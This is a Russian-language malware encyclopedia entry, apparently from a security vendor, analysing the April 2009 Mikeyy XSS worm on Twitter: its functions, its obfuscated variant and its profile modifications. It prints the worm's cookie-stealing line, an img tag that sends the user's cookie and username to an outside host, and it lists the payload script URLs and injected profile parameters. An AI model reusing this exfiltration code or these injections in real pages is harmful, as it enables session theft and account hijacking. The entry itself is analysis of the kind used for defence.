Технические детали
Семейство XSS-червей, распространявшихся в социальной сети Twitter в апреле 2009 года. Для своего размножения использовали XSS-уязвимости и были созданы 17-и летним американцем Michael "Mikeyy" Mooney.
Червь использовал уязвимости в программном обеспечении Twitter, позволявшие производить атаки типа «межсайтовый скриптинг» (XSS) и модифицировать страницы учётных записей пользователей. Заражение происходило при посещении модифицированной страницы на сайте Twitter, или при переходе по гиперссылке в поддельном сообщении, присланном от имени участника Twitter. При этом исполнялся вредоносный сценарий JavaScript.
Основной функционал червей содержится в трех функциях:
- XHConn – использует стандартную функцию XMLHttpRequest() для ajax-вызовов;
- Urlencode – использует стандартную функцию encodeURIComponent() для кодировки URI;
- Wait – содержит вредоносный функционал.
Net-Worm.JS.Twettir.g — обфусцированный вариант.
Инициируется выполнение скрипта j.php в теге img, которому передаются параметры cookies и username текущего пользователя:
document.write("<img src=' http://content.ireel.com/j.php?c=" + cookie + "&username=" + username + "'>");
От имени текущего пользователя посылается сообщение посредством POST-запроса пользователю с id = 30685046, содержащее строку “You got me. :)” и содержимое cookies-файла.
Данный вариант червя изменяет следующие параметры пользователя, что приводит к добавлению одной из ссылок на зловредные скрипты : user[url], user[profile_link_color], user[&user[url]. Добавляется один из следующих скриптов:
http://content.ireel.com/jsxss.js
http://content.ireel.com/xssjs.js
http://bambamyo.110mb.com/wompwomp.js
Также червь изменяет параметры пользователя на следующие:
user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++;
user[profile_background_color]="+urlencode('##Mikeyy')+"
в результате чего у зараженного пользователя меняется имя аккаунта и фон его страницы.
RSS-каналы
